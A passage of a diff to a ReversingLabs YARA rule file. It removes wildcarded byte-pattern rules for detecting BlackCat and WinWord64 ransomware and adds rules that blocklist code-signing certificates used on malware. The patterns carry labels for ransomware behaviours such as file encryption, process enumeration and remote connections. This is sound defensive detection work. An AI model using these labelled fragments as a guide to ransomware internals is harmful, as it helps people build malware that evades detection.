6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? - ?? 83 EC ?? 53 56 57 89 65 ?? 33 DB 89 5D ?? 6A ?? FF 15 ?? ?? ?? ?? 59 83 0D ?? ?? - ?? ?? ?? 83 0D ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 08 FF 15 ?? ?? - ?? ?? 8B 0D ?? ?? ?? ?? 89 08 A1 ?? ?? ?? ?? 8B 00 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 39 - 1D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 35 ?? ?? ?? - ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 15 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ding Ruan" and pe.signatures[i].serial=="45:fb:cd:b1:fb:d3:d7:02:fb:77:25:7b:45:d8:c5:8e" and 1476662400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4B5D8Ed5Ca011679F141F124 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "c8bc0968-29d0-51a9-8cfe-7c8f447cef3d" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13710-L13726" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "39ff0d5fd711524ce181596033d1d51579cd086eb20b87722aebf39623bbaa17" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($entrypoint_all at pe.entry_point) and ($main_1 or $main_2 or ($main_3 and $start_service_3) or $main_4 or $main_5 or ($main_6 and ($set_reg_key_6 or $download_tor_6)) or $main_7 or $main_8) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="4b:5d:8e:d5:ca:01:16:79:f1:41:f1:24" and 1480644725<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Blackcat : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_33671F1Bcbd0F5E231Fc386F4895000E : INFO FILE { meta: - description = "Yara rule that detects BlackCat ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e623340d-8df8-5f13-b75f-379bd0038f64" - date = "2022-02-14" - modified = "2022-02-14" + id = "0863e1ed-7b9c-5a60-82ac-eadc3c23fbd9" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.BlackCat.yara#L1-L109" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "24932baa625aedd14b5776ba3209c9ee330e84538c5267eeb5e09e352f655835" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13728-L13744" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9199c8d76e3390ec9038808b4e88b803b3f3d6966af6206d0c9968d9ab673f31" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "BlackCat" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_p1 = { - 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? A1 ?? - ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 - ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? - ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? A1 ?? ?? ?? ?? 0F 45 C1 8B 0D ?? ?? - ?? ?? 0F 45 CA 8D 54 24 ?? 89 94 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? - ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 - 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? - ?? ?? ?? 56 51 FF 50 ?? 83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ?? - FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? - ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 - ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? - ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 85 - } - $remote_connection_p2 = { - C0 89 44 24 ?? 0F 88 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 74 ?? A1 ?? ?? ?? ?? 89 CB 85 C0 - 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 50 E8 - ?? ?? ?? ?? 85 C0 89 D9 75 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ?? - 53 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 89 F1 8D 54 24 ?? 89 44 24 ?? 89 5C 24 - ?? 89 5C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? 8B 84 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? - ?? ?? ?? 3D ?? ?? ?? ?? 0F 43 C1 6A ?? 50 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 - 44 24 ?? 75 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? FF 74 24 ?? 6A ?? FF 35 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 0F 84 ?? ?? ?? ?? 80 BB ?? ?? ?? ?? - ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB - } - $enum_procs = { - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 39 F7 74 ?? - 69 C7 ?? ?? ?? ?? 89 4D ?? 01 C8 68 ?? ?? ?? ?? 89 DE 53 50 E8 ?? ?? ?? ?? 83 C4 ?? - 47 8D 85 ?? ?? ?? ?? 89 7D ?? 50 8B 5D ?? 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 89 - F3 89 C6 EB ?? 8D 4D ?? 89 F2 E8 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? EB ?? 31 FF 8B 75 ?? - 85 FF 75 ?? E9 ?? ?? ?? ?? 31 FF 53 E8 ?? ?? ?? ?? 8B 75 ?? 85 FF 0F 84 ?? ?? ?? ?? - 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 69 C7 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? 01 F0 89 - 45 ?? 8B 45 ?? 8D 04 40 8D 04 81 89 45 ?? EB - } - $find_files = { - 57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 56 E8 ?? ?? ?? - ?? 83 F8 ?? 89 45 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? - ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 0F - 84 ?? ?? ?? ?? 89 C6 8B 45 ?? 8B 4D ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ?? - 8D 41 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 CB 50 E8 ?? ?? - ?? ?? 83 C4 ?? 8B 45 ?? 89 43 ?? 89 73 ?? 8B 75 ?? 31 C0 C7 43 ?? ?? ?? ?? ?? F7 45 - ?? ?? ?? ?? ?? 89 03 75 ?? 83 7D ?? ?? 74 ?? 57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? 83 7D ?? ?? 74 ?? FF 75 ?? 6A ?? FF 35 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5E 5F 5B 5D C3 - } - $encrypt_files_p1 = { - B8 ?? ?? ?? ?? 8D 4D ?? 8D 95 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 75 - ?? 8D 4D ?? 89 FA 56 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 8B 5D ?? 89 - 45 ?? 8B 45 ?? 83 F8 ?? 72 ?? 85 DB 74 ?? 0F B7 0B 81 F9 ?? ?? ?? ?? 75 ?? 8B 4B ?? - 89 C2 29 CA 72 ?? 83 FA ?? 72 ?? 85 DB 74 ?? 81 3C 0B ?? ?? ?? ?? 75 ?? 0F B7 54 0B - ?? 81 FA ?? ?? ?? ?? 75 ?? 0F B7 54 0B ?? 83 EA ?? 89 55 ?? BA ?? ?? ?? ?? 19 D2 89 - 55 ?? 72 ?? 83 F9 ?? 76 - } - $encrypt_files_p2 = { - 53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 57 - 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 51 ?? 29 D0 8B 55 ?? 0F 92 - 45 ?? 83 7D ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 39 C2 77 ?? B8 ?? ?? ?? ?? F7 64 0B ?? 8B - 55 ?? 70 ?? 39 C2 72 ?? 8B 44 0B ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? 8B 85 ?? - ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? - 89 45 ?? 89 10 89 48 ?? 8B 45 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? - 8B 45 ?? 8B 4D ?? 29 45 ?? 3B 4D ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ?? - ?? 8B 45 ?? 8B 4D ?? 89 45 ?? 89 4D ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 35 ?? ?? - ?? ?? 8B 45 ?? F2 0F 10 45 ?? 85 F6 89 85 ?? ?? ?? ?? F2 0F 11 85 ?? ?? ?? ?? 0F 84 - ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8D 0C C0 8D 3C 49 01 C7 01 F7 EB - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALAIS, OOO" and pe.signatures[i].serial=="33:67:1f:1b:cb:d0:f5:e2:31:fc:38:6f:48:95:00:0e" and 1491868800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_32Bc299F0694C19Ec21E71265B1D7E17 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "fa2302c3-4002-5bf0-812b-45298abbda8d" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13746-L13762" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cb522e3084d382c451a8b040095e75582675f90dbb588e370f2f0054f4c2d14b" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($enum_procs) and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="32:bc:29:9f:06:94:c1:9e:c2:1e:71:26:5b:1d:7e:17" and 1474416000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Winword64 : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_7B75C6B0A09Afdb9787F6Dff75Ae7844 : INFO FILE { meta: - description = "Yara rule that detects WinWord64 ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a5f7967d-58f4-5fdd-b67f-5f5dbfec0f4b" - date = "2021-02-11" - modified = "2021-02-11" + id = "0b34c7ce-fa75-5340-a473-fa87fab93b86" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.WinWord64.yara#L1-L215" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "73d8c4f1b3bed365320b26332f1f1b49404d8e6536f3e25042f5f64e5bc09bd4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13764-L13780" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8fd125a526b3433fbb8a5c6fa74ce0b0e2de8ff789880c355625d4140cd902a2" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "WinWord64" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? A1 ?? ?? ?? - ?? 33 DB 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? - 03 C1 89 9D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51 - 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 89 5D ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? - ?? ?? ?? 53 0F 43 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? - 85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 0D - ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51 50 51 - 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 53 - FF 15 ?? ?? ?? ?? 8B 55 ?? 8B D8 89 9D ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 - ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? - 76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? 66 89 45 ?? 85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? - ?? ?? A1 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 - } - $remote_connection_p2 = { - 0F 43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D BD ?? - ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 BD ?? ?? ?? ?? 83 - 3D ?? ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F - 43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 57 53 FF 15 ?? ?? ?? - ?? 8B 55 ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? - 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 - E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 95 ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? - ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? - FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D ?? 03 C1 83 7D ?? ?? 8D 4D - ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? - ?? 83 BD ?? ?? ?? ?? ?? 8D 4D ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? - ?? ?? 83 3D ?? ?? ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B - } - $remote_connection_p3 = { - 55 ?? 2B C2 57 51 3B F8 77 ?? 8D 04 3A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 - 10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04 37 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 - ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 75 ?? 8B C6 - 8B BD ?? ?? ?? ?? 0F 43 CF 8B 55 ?? 2B C2 8B 9D ?? ?? ?? ?? 53 51 3B D8 77 ?? 8D 04 - 1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04 - 1E ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B BD - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 83 3D ?? ?? - ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 55 ?? 2B C2 53 51 - 3B D8 77 ?? 8D 04 1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ?? - ?? 83 C4 ?? C6 04 33 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8 - ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 45 ?? 0F 43 - D3 8B 75 ?? 2B C6 8B 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ?? - 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 06 ?? - EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 9D ?? ?? - ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B - } - $remote_connection_p4 = { - 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 - ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 - ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B D0 83 78 ?? ?? 72 ?? 8B 10 - 8B 48 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D - 04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 - ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? - ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? - ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52 - 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 83 3D - ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D - ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 - F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? - ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43 - 55 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 - 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? - C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? - 83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ?? - 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 31 89 45 ?? 8D - } - $remote_connection_p5 = { - 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB - ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? - ?? 85 F6 74 ?? 8B 45 ?? 8D 4D ?? 83 7D ?? ?? 6A ?? 0F 43 4D ?? 50 50 51 6A ?? FF B5 - ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? - ?? ?? ?? 51 68 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 F6 8B 35 ?? - ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF D6 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B - 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA - ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 - E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - C6 45 ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ?? - 2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? - ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7 - } - $remote_connection_p6 = { - 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? - 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 - F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? 